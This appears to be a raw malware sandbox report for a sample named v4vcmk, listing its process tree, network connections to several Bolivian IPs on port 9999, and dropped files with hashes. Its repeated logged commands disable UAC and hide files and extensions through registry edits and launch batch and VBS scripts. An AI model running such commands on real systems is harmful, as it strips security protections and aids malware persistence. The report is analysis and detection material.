reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\yMMkQcAU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ksEYoQAE.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\owwAQMQE.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\wIocwAUA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\QmowIgAk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tikIAoco.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XAwMsssE.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\RuUckkEk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\RkooYoQY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\RCosMUck.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\NIssgkQY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

Network

Country Destination Domain Proto
BO 200.87.164.69:9999 tcp
BO 200.87.164.69:9999 tcp
US 8.8.8.8:53 google.com udp
NL 142.251.36.46:80 google.com tcp
NL 142.251.36.46:80 google.com tcp
BO 200.119.204.12:9999 tcp
BO 200.119.204.12:9999 tcp
BO 190.186.45.170:9999 tcp
BO 190.186.45.170:9999 tcp

Files

memory/1572-54-0x0000000075D11000-0x0000000075D13000-memory.dmp

\Users\Admin\hYgwkYwM\QgAscQoI.exe

MD5 9dff3452022befb206f015c6f80589e0
SHA1 de5acdcfa01345e4d033b8c9f9443cf1cfb75180
SHA256 967bb0265c7e1a830467c5d14b5ddebd09fc8d277d269fd16aa01be015e7e0b0
SHA512 e6bce9d5a2f79cd9d625a84822383628ddc97beaf85ccb4d47b7cd12c5edf16016f0ac084bd65ec96e6a6318fd7ce6e8667cab65ec076681b28c3d3d842a0294

\Users\Admin\hYgwkYwM\QgAscQoI.exe

MD5 9dff3452022befb206f015c6f80589e0
SHA1 de5acdcfa01345e4d033b8c9f9443cf1cfb75180
SHA256 967bb0265c7e1a830467c5d14b5ddebd09fc8d277d269fd16aa01be015e7e0b0
SHA512 e6bce9d5a2f79cd9d625a84822383628ddc97beaf85ccb4d47b7cd12c5edf16016f0ac084bd65ec96e6a6318fd7ce6e8667cab65ec076681b28c3d3d842a0294

C:\Users\Admin\hYgwkYwM\QgAscQoI.exe

MD5 9dff3452022befb206f015c6f80589e0
SHA1 de5acdcfa01345e4d033b8c9f9443cf1cfb75180
SHA256 967bb0265c7e1a830467c5d14b5ddebd09fc8d277d269fd16aa01be015e7e0b0
SHA512 e6bce9d5a2f79cd9d625a84822383628ddc97beaf85ccb4d47b7cd12c5edf16016f0ac084bd65ec96e6a6318fd7ce6e8667cab65ec076681b28c3d3d842a0294

\ProgramData\DmwYMgQc\PKsMQUYQ.exe

MD5 3be99b7b258fa201572ae7757ed5ff5e
SHA1 3b070fe8c5635be98de277303f0f3c9fedeb9d69
SHA256 b270e6c3d178fb23f8551ce49c6bf3ef7c69d9fe0141cace2ecb59c66142619c
SHA512 b0e34f95c1df6060785268c8cfd4a6378e3671e8caf2f9ba00d395c40c71456b3ce85cb716d98779004d2a0722d39c8ff81e60939ec7f38841f3d0b9789790f2

\ProgramData\DmwYMgQc\PKsMQUYQ.exe

MD5 3be99b7b258fa201572ae7757ed5ff5e
SHA1 3b070fe8c5635be98de277303f0f3c9fedeb9d69
SHA256 b270e6c3d178fb23f8551ce49c6bf3ef7c69d9fe0141cace2ecb59c66142619c
SHA512 b0e34f95c1df6060785268c8cfd4a6378e3671e8caf2f9ba00d395c40c71456b3ce85cb716d98779004d2a0722d39c8ff81e60939ec7f38841f3d0b9789790f2

C:\ProgramData\DmwYMgQc\PKsMQUYQ.exe

MD5 3be99b7b258fa201572ae7757ed5ff5e
SHA1 3b070fe8c5635be98de277303f0f3c9fedeb9d69
SHA256 b270e6c3d178fb23f8551ce49c6bf3ef7c69d9fe0141cace2ecb59c66142619c
SHA512 b0e34f95c1df6060785268c8cfd4a6378e3671e8caf2f9ba00d395c40c71456b3ce85cb716d98779004d2a0722d39c8ff81e60939ec7f38841f3d0b9789790f2

memory/1572-63-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AUwAQEUk.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/1400-70-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\JuUQAEgM.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/1600-76-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/1064-80-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\NmMQogAg.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/1224-86-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\NkMIMssg.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/1464-92-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\JUggIQEk.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/900-96-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\dCsQkskY.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/1892-103-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wyQEgkcE.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/1948-109-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\KcUkIQsw.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\ProgramData\DmwYMgQc\PKsMQUYQ.inf

MD5 0de967a49dc8d61fc3e22e7a174000e7
SHA1 fe497ab942df3aad985d91b2125db233d55937a5
SHA256 0c9bb5da559b098006e5f0081ee964263d963a556cd7d196bc3af8445d00c9f5
SHA512 2a3608012ac5938cdac05cdccdae8003091f3e940a16c8e65d130c3ee7a706f4b54e13f20c9fbacde21cc52db9b3c462e41692abeb259f57212e3c46f9678f11

memory/1464-116-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\GgcsscgA.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

C:\Users\Admin\hYgwkYwM\QgAscQoI.inf

MD5 0de967a49dc8d61fc3e22e7a174000e7
SHA1 fe497ab942df3aad985d91b2125db233d55937a5
SHA256 0c9bb5da559b098006e5f0081ee964263d963a556cd7d196bc3af8445d00c9f5
SHA512 2a3608012ac5938cdac05cdccdae8003091f3e940a16c8e65d130c3ee7a706f4b54e13f20c9fbacde21cc52db9b3c462e41692abeb259f57212e3c46f9678f11

memory/1368-123-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ASoMwQUc.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
